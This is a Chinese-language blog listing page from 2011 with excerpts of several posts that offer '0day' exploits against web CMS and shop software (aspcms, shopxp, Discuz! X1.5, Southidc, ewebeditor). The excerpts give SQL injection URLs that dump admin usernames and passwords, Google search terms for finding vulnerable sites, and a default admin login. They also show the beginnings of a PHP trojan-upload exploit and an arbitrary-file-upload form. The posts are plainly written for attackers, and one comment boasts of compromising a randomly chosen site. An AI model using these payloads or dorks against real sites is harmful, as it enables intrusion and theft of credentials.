aspcms建站系统注入0day

   
分类:安全 | 2011-09-7 | 撸过 2,691 次
1人扯蛋

aspcms开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且

支持模版自定义、支持扩展插件等等,能够在短时间内完成企业建站。

漏洞文件:/plug/productbuy.asp

对接收的参数id没有进行过滤而导致的注入漏洞

注入后的页面有跳转,所以要快,建议用快捷键复制

爆用户名EXP:

https://www.webshell.cc/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,[......]

继续阅读

shopxp网上购物系统v7.4爆密码0day

   
分类:安全 | 2011-09-5 | 撸过 1,611 次
1人扯蛋

版 本:shopxp网上购物系统 v7.4
关键词:inurl:shopxp_news.asp
后 台:shopxp_admin
暴密码的语句:
/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin

这不错 刚刚随便选了一个 爆了!

[......]

继续阅读

Discuz! X1.5爆0day漏洞 建议升级2.0版本

   
分类:安全 | 2011-08-15 | 撸过 5,263 次
0人扯蛋

近日,网络上开始流传一个影响到Discuz! X1.5的0day漏洞,据说利用此漏洞可以上传php木马。建议Discuz! X1.5升级2.0版本。

以下为黑客公布的Discuz! X1.5 0day 利用方法:

 

 

把下面内容保存为exp.php   在php环境下运行 php exp.php

<?php

print_r('

+---------------------------------------------------------------------------+

Discuz! X1-1.5 notify_credi[......]

继续阅读

南方数据企业网站V13静态版

   
分类:安全 | 2011-08-5 | 撸过 875 次
0人扯蛋

采用了SouthidcEditor5.5版本编辑器

经过测试网上的ewebeditor5.5 0day用不了

利用方法

Google搜索:inurl:ASP/Default.html

后台/SouthidcEditor/admin/login.asp
默认帐号admin

密码admin888[......]

继续阅读

ewebeditor PHP 3.8版本上传任意文件0day

   
分类:安全 | 2011-08-2 | 撸过 1,814 次
0人扯蛋

PHP版本的ewebeditor用的比ASP版本的少的多吧,俺是非常少碰到。貌似
听说国外用的非常多。台湾人喜欢用?用的着的关注一下吧。

EXP如下:

<title>eWebeditoR3.8 for php任意文件上EXP</title>
<form action="" method=post enctype="multipart/form-data">
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
URL:<input type=text name=url valu[......]

继续阅读